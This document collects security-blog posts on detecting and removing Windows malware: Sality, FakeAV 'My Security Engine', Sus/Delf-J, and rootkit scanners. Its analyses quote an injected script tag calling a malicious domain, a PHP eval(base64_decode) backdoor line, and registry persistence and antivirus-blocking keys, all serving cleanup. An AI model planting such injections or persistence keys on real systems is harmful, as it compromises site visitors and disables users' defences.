How to detect virus files?

Virus files now a days are more improved and hard to find than earlier, now some files have nice icon so user cant imagine that file is virus or unwanted. Normal Properties of virus or infected files, that always tries to connect internet and get other unwanted softwares or files to the victims computer.

Some Trojan files like Sality.AA copies its file to windows\system32 with same file size, so it can identify easily, some may in hidden, and creates files in all folder with same name as folder. For Example, i have a folder in C:\myfolder, when this trojan infect the system, creates files in that folder with name myfolder.exe with size ~499 KB, if we open that file nothing opens but system will get busy. Like that so many files where created in those Drives and folders.

How To Delete these files:

Use Windows Search utility or any alternative, before that find file size of file created, like myfolder.exe, if this filesize is 499 KB, add file size in Search parameter so you can easily delete all folder named execute files.

Note:

If any exe file is running, you cannot delete some files, before that end those suspected file processess. You can use Windows Task Manager or any Alternative Task Processes lister like Process Explorer.
Get Process explorer from
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
http://en.wikipedia.org/wiki/Process_Explorer

From Process Explorer you can delete files, download this free program.

Detect Infected Virus Files.

To Detect infected files is simple. If you think your normal application tooks more time than normal, it may be the cause of virus infection. Bitdefender is the Best Antivirus software can be used in Disinfection of virus infected files.

Related posts:

1. 6 Must Have Replacement Tools when Fixing a Computer Infected by Virus
2. Removal of Advanced Virus Remover (Manual)
3. How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools

RootRepeal is a new rootkit detector currently in public beta.

It is designed with the following goals in mind:

1. Easy to use – a user with little to no computer experience should be able to use it.
2. Powerful – it should be able to detect all publicly available rootkits.
3. Stable – it should work on as many different system configurations as possible, and, in the event of an incompatibility, not crash the host computer.
4. Safe – it will not use any rootkit-like techniques (hooking, etc.) to protect itself.

Currently, RootRepeal includes the following features:

1. Driver Scan – scans the system for kernel-mode drivers.  Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver’s file is visible on-disk.
2. Files Scan – scans any fixed drive on the system for hidden, locked or falsified* files.
3. Processes Scan – scans the system for processes.  Displays all processes currently running, and shows if a processes is hidden or locked.
4. SSDT Scan – shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
5. Stealth Objects Scan – attempts to determine if any rootkits are active by looking for typical symptoms.
6. Hidden Services Scan – scans for hidden system services.
7. Shadow SSDT Scan – counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

* – falsified files are files which have their size mis-reported to the Windows API.  Some rootkits use this to hide data.

RootRepeal is currently in public beta.  Whereas every effort has been made to ensure compatibility with every system configuration on Windows 2000, XP, 2003 and Vista, it cannot be guaranteed.  There is always some risk when scanning for rootkits.  Before running RootRepeal, please make sure you have backups of all important data and have saved all open documents.

System Requirements

• Microsoft® Windows 2008 Server; Windows Vista®; Windows XP Professional or Home Edition; Windows 2000 with Service Pack 4; Windows 2003 Server
  Note: Only x86 versions of Windows are supported.
• 128MB of RAM.
• 600KB of hard-drive space.

Download: RootRepeal.rar
MD5 (of the EXE): 880D7A26B7BB6B00A0709E75F149B83D
SHA-1 (of the EXE): 1943798277BBB1C396A980C58D077F5A57636932

VirusTotal Scan: http://www.virustotal.com/analisis/dd2d8492185ded564fdae8f5a1d85946123c346086763a238b0d74f1e2848259-1250214648

NOTE : Because, as mentioned above, there is always an element of risk when scanning for rootkits, the author offers NO WARRANTY for RootRepeal.  USE AT YOUR OWN RISK!

The latest version of RootRepeal can always be found at the static links http://rootrepeal.googlepages.com/RootRepeal.rar, or http://rootrepeal.googlepages.com/RootRepeal.zip (see below for more mirrors, in case the bandwidth limits have been exceeded).

Note: This site has recently been exceeding bandwidth, so if any of the above download links are unavailable, please use one of the following:

http://ad13.geekstogo.com/RootRepeal.zip
http://ad13.geekstogo.com/RootRepeal.rar
http://rootrepeal.psikotick.com/RootRepeal.zip
http://rootrepeal.psikotick.com/RootRepeal.rar

For more info about this project :  http://sites.google.com/site/rootrepeal/

Related posts:

1. Sophos Anti-Rootkit updated – download it for free
2. Android rootkits – malware on your smartphone
3. Removal of Advanced Virus Remover (Manual)

Severity Level : 8/10

Alias:

• Mal/FakeAV-BW [Sophos]
• Generic FakeAlert!hr [McAfee]
• Packed.Win32.Krap.an [Kaspersky Lab]
• NOT Detected [Microsoft]

packupdate_build107_302.exe VirusTotal Report : (Click Here)

Infected Websites

This Malware is coming  from  infected website most of them hosted by GoDaddy, they Tweeted about this matter (http://twitter.com/GoDaddy/status/13199601776).

When the site got infected you will see the following line inserted just before the </body> tag  in the source of any of the PHP pages:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (The hacked code):

<?php /**/ eval(base64_decode("Random Code" ));?>

When you decode this, it equates to:

Remove The hacked code from infected sites

Search inside all index.php and *.php files for these codes and delete it :

1-  <script src=“http://kdjkfjskdfjlskdjf.com/kp.php“></script>

2-  <?php /**/ eval(base64_decode(“Random Code“ ));?>

Removing that from all your index and PHP files should solve the problem.

Infected PCs With ( Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an )

File System Modifications

The following files were created in the system:

• %APPDATA%\My Security Engine\ Instructions.ini
  
• %APPDATA%\My Security Engine\ winupdate.exe
• %APPDATA%\Microsoft\Internet Explorer\Quick Launch\ My Security Engine.lnk
• %USERPROFILE%\Desktop\ My Security Engine.lnk
• %USERPROFILE%\Recent\ cb.drv
• %USERPROFILE%\Recent\ CLSV.dll
• %USERPROFILE%\Recent\ eb.dll
• %USERPROFILE%\Recent\ eb.exe
• %USERPROFILE%\Recent\ eb.sys
• %USERPROFILE%\Recent\ exec.exe
• %USERPROFILE%\Recent\ fan.dll
• %USERPROFILE%\Recent\ fix.dll
• %USERPROFILE%\Recent\ FW.dll
• %USERPROFILE%\Recent\ kernel32.exe
• %USERPROFILE%\Recent\ pal.dll
• %USERPROFILE%\Recent\ ppal.exe
• %USERPROFILE%\Recent\ snl2w.dll
• %USERPROFILE%\Recent\ tjd.sys
• %USERPROFILE%\Start Menu\My Security Engine.lnk
• %USERPROFILE%\Start Menu\Programs\My Security Engine.lnk
• %ALLUSERSPROFILE%\Application Data\e5adcb6\8654.mof
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSE.ico
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSESys\vd952342.bd
• %ALLUSERSPROFILE%\Application Data\MSJMKE\MSTSKDKCKE.cfg

Note:

• %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
• ? = Random file name.

Memory Modifications

There were new processes created in the system:

The following Internet action was started (the retrieved bits are saved into the local file):

Registry Modifications

The newly created or modified Registry Value is:

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_CURRENT_USER\Software\3]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“IIL”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltHI”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltTST”=dword:0000ba3e

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“PRS”=”http://127.0.0.1:27777/?inj=%ORIGINAL%“

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]
“MSCompatibilityMode”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Enable”=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Size”=dword:0000000a

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“InitHits”=dword:00000064

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Factor”=dword:00000014

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\88AA5029C7E29F56EE18C3764A808C2A6CE0BE8E]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr”=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:%pfvqy2%\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Fgneg Zrah\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
“UID”=”2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“969903903″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“Version/12.02045″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“My Security Engine”=”\”C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\” /s /d”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Desktop\\packupdate_build106_2045.exe”=”packupdate_build106_2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\taskkill.exe”=”Kill Process”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe”=”MSe5ad”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\System32\\Wbem\\mofcomp.exe”=”mofcomp”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\netsh.exe”=”Network Command Shell”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\cmd.exe”=”Windows Command Processor”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Application Data\\My Security Engine\\winupdate.exe”=”winupdate”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\ntvdm.exe”=”NTVDM.EXE”

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableFileTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableConsoleTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“ConsoleTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“MaxFileSize”=dword:00100000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileDirectory”=hex(2):25,77,69,6e,64,69,72,25,5c,74,72,61,63,69,6e,67,00,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]
“Debugger”=”svchost.exe”
.

.

.

etc.

Removal Tools :

1 – Download the free version of Malwarebytes that provided by www.malwarebytes.org from Here.

2 – Download MicrosoftFixit50267.msi to fix hosts file from Here.

Related posts:

1. Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware
2. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
3. Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM

The SalityKiller.exe utility given in this article allows detecting and disinfecting only the following Sality modification Virus.Win32.Sality.aa, Virus.Win32.Sality.ag.

In order to disinfect a computer from Virus.Win32.Sality.aa, do the following:

If infected computers are in the local network under domain control:

Step 1. Preparation to disinfection:

• Download the file SalityKiller.zip
• Unpack the file SalityKiller.zip
• Run the file SalityKiller.exe on each computer in turn (for example, through Kaspersky Administration Kit, or the server group policy).
  • on all computers on which the domain administrator can register and work

While disinfecting this group of the computers do not log on under domain administrator on any other computers to prevent further spread of the infection in the network.

• • on all other computers

Do not stop or terminate work of the utility until all computers in the network have been disinfected.

Step 2. Algorithm of computer disinfection.

Computers on which you log on under a domain administrator rights should be disinfected first. Once these computers are disinfected, start disinfecting other computers in the network.

• Run the utility SalityKiller.exe on the infected computers once again (no additional commands to run the utility are needed).
• Make sure the anti-virus icon in the tray has turned red thus indicating the anti-virus software is fully functional. If otherwise, reinstall the anti-virus via Kaspersky Administration Kit.
• Update the anti-virus databases (signature threats) for the Kaspersky Lab’s product installed on your PC. If you cannot download the updates from the Internet, update from the zip-archives. 
  • how to update Kaspersky Lab’s products version 5.0 from the zip archives.
  • how to update Kaspersky Lab’s products version 6.0 from the zip archives
  • how to update Kaspersky Lab’s products version 7.0 from the zip archives
• set the full scan options to their maximum scan level
• run full computer scan

Step 3. Signs of a disinfected/ clean computer

• Kaspersky Anti-Virus is running and works in normal mode
• full computer scan does not detect infected objects on the computer

Step 4. Cleaning the registry of infected computers in the domain network:

• download the file Sality_RegKeys.zip
• unpack the file Sality_RegKeys.zip
• run the file Disable_autorun.reg from the archive Sality_RegKeys.zip

  You can also disable autorun from all devices by running the SalityKiller utility with parameter -a.

• Click Yes to confirm adding the information to the registry

• once the scan is over, from the archive Sality_RegKeys.zip run the file of the registry key: 
  • under Windows 2000 run the registry file SafeBootWin200.reg
  • under Windows XP run the registry file SafeBootWinXP.reg
  • under Windows 2003 run the registry file SafeBootWinServer2003.reg
  • under Windows Vista run the registry file SafebootVista.reg

If infected computer are not in the network

• Disable the technologies iSwift and iChecker, if one of the following products is installed and running on your PC:
  • Kaspersky Anti-Virus 7.0
  • Kaspersky Internet Security 7.0
  • Kaspersky Anti-Virus 6.0
  • Kaspersky Internet Security 6.0
  • Kaspersky Anti-Virus  2009;
  • Kaspersky Internet Security 2009;
  • Kaspersky Anti-Virus  2010;
  • Kaspersky Internet Security 2010;
  • Kaspersky Anti-Virus 6.0 for Windows Workstations
  • Kaspersky Anti-Virus 6.0 SOS
  • Kaspersky Anti-Virus 6.0 for Windows Servers
• Download and unpack the file SalityKiller.zip
• Run the file SalityKiller.exe

With an installed Kaspersky Lab product you might be prompted to allow any activity to the process Sality_killer.exe

• • Go to Start > All programs > right-click Startup > select Open

• • Right-click any place in the Startup folder
  • In the menu select New > Shortcut
  • In the Create Shortcut window click Browse
  • Browse the folder into which the file SalityKiller.exe was unpacked
  • Highlight the file SalityKiller.exe
  • Click the OK button
  • Click Next
  • Click OK

• Download the file Sality_RegKeys.zip
• Unpack the file Sality_RegKeys.zip
• Run the file Disable_autorun.reg from the archive Sality_RegKeys.zip

  You can also disable autorun from all devices by running the SalityKiller utility with parameter -a.

• Click Yes to confirm adding the information to the registry

• Update the anti-virus databases (threat signatures) for the installed Kaspersky Lab’s product. If you cannot download the necessary databases (threat signatures) form the Internet, update the databases from the zip archives:
  • how to update Kaspersky Lab’s products version 5.0 from the zip archives
  • how to update Kaspersky Lab’s products version 6.0 from the zip archives
  • how to update Kaspersky Lab’s products version 7.0 from the zip archives
• set the full scan options to their maximum scan level
• run full computer scan
• once the scan is over, from the archive Sality_RegKeys.zip run the file of the registry key: 
  • under Windows 2000 run the registry file SafeBootWin200.reg
  • under Windows XP run the registry file SafeBootWinXP.reg
  • under Windows 2003 run the registry file SafeBootWinServer2003.reg
  • under Windows Vista run the registry file SafebootVista.reg

You can restore the registry branch SafeBoot which is needed for a PC to be able to boot in safe mode, by running SalityKiller.exe with parameter -j.

Additional parameters to run SalityKiller.exe from command line:

-p <path> – scan a specific folder;
-n – scan network disks;
-r – scan flash drives, scan removable hard disks connected via USB and Fire Wire;
-y – close the window when the utility finishes;
-s - scan in “silent” mode (without opening console box);
-l <file_name> – write log to the file;
-v – detailed logging (must be used in combination with -l);
-x - restore possibility to view hidden and system files;
-a – disable autorun from any devices;
-j – restore the registry branch SafeBoot (if it is deleted, the PC will not be able to start up in Safe mode);
-m – monitoring mode to protect the system from getting infected;
-q – scan the system and then go to monitoring mode;
-k – the utility will scan all disks, detect files autorun.inf created by the virus Virus.Win32.Sality and eliminate them. It will also delete the executable file linked by autorun.inf, even if such file has been already disinfected.

Related posts:

1. How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah
2. New Sality Virus In Sight ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah )
3. Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC

You will need a Reg Editor, Notification queue Manager, File Explorer

( we are using http://www.dotfred.net/TaskMgr.htm in the video )

Related Blogs

Related posts:

1. Windows Mobile Terdial Trojan makes expensive phone calls
2. The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually
3. How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan

HouseCall is Trend Micro’s highly popular and capable on-demand scanner for identifying and removing viruses, Trojans, worms, unwanted browser plugins, and other malware.

HouseCall 7 features an intuitive interface and the ability to perform fast scans that target critical system areas and active malware. It also leverages the Trend Micro Smart Protection Network™ to help ensure that scans catch the latest threats.

HouseCall 7.1 improves on the recently released HouseCall 7.0 by providing a full system scan option and an option to scan only specific folders. It adds support for 64-bit versions of Windows Vista™ and Windows™ 7.

HouseCall provides a quick and easy check for threats regardless of the protection status of your existing security solution. For more information about HouseCall, please read the Frequently Asked Questions.

What’s new in HouseCall?

• Full system and custom scan options allow users to specify which folders to scan (new in 7.1).
• Quick scan option offers targeted scanning of critical system areas and active threats, reducing scan times to within a few minutes.
• Stand-alone, browser-independent implementation eliminates compatibility issues associated with browser-activated scanners.
• Smart Scan technology refers to patterns in the cloud, delivering the latest protection while reducing download times.
• Smart Feedback shares threat information with the Smart Protection Network, which correlates data from a global intelligence network to quickly discover new threats.
• Review and restore lets you check and compare scan results and recover files.
• Enhanced detection and cleanup addresses rootkits and other sophisticated threats.

Download HouseCall 7.1 (32-bit) | Download HouseCall 7.1 (64-bit)

Getting Started with HouseCall

1. Click Download HouseCall to begin. Please note that HouseCall requires a small download before it can scan your computer.
2. You can choose to save a copy of the launcher (HousecallLauncher.exe) and use it to quickly starts scan. Remember to visit this page occasionally to get the latest copy of the launcher.
3. It is recommended that first-time users select the Quick Scan option, which is available in addition to the Full Scan or Folder Scan options.
4. Enabling the Smart Feedback setting helps increase the strength of the Smart Protection Network by sharing malware and threat data as part of our global neighborhood watch program. No personally identifiable information is gathered as part of participation.

Related Blogs

Related posts:

1. 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)
2. New Free SUPERAntiSpyware Online Scanner/Remover!
3. Free Sophos Endpoint Assessment Free Online Test

Severity Level : 7/10

Alias:

• Sus/Delf-J [Sophos]
• NOT Detected [McAfee]
• NOT Detected [Kaspersky Lab]
• NOT Detected [Microsoft]

Foto_253.com VirusTotal Report : (Click Here)

File System Modifications

The following files were created in the system:

• %systemdrive%\path\ javahr.exe
  
• %systemdrive%\path\ javahr2.exe
• %systemdrive%\path\ javahn.dll
• %systemdrive%\uacpath\javahu.exe

Note:

• %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
• ? = Random file name.

Memory Modifications

There were new processes created in the system:

The following Internet action was started (the retrieved bits are saved into the local file):

Registry Modifications

The newly created or modified Registry Value is:

[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]

[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]
@=”"

[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]

[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]
@=”c:\\path\\javahn.dll”

[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]
“ThreadingModel”=”Apartment”

[HKEY_CURRENT_USER\rhavaj]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\Sbgb_253(2).pbz”=hex:01,00,00,00,06,00,00,00,10,79,2b,41,0a,d4,ca,01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Desktop\\Foto_253(2).com”=”Foto_253(2)”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\taskmgr.exe”=”Windows TaskManager”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“c:\\path\\javahr.exe”=”javahr”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“c:\\path\\javahr2.exe”=”javahr2″

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]
@=”"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]
@=”c:\\path\\javahn.dll”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]
“ThreadingModel”=”Apartment”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“javahr”=”c:\\path\\javahr.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
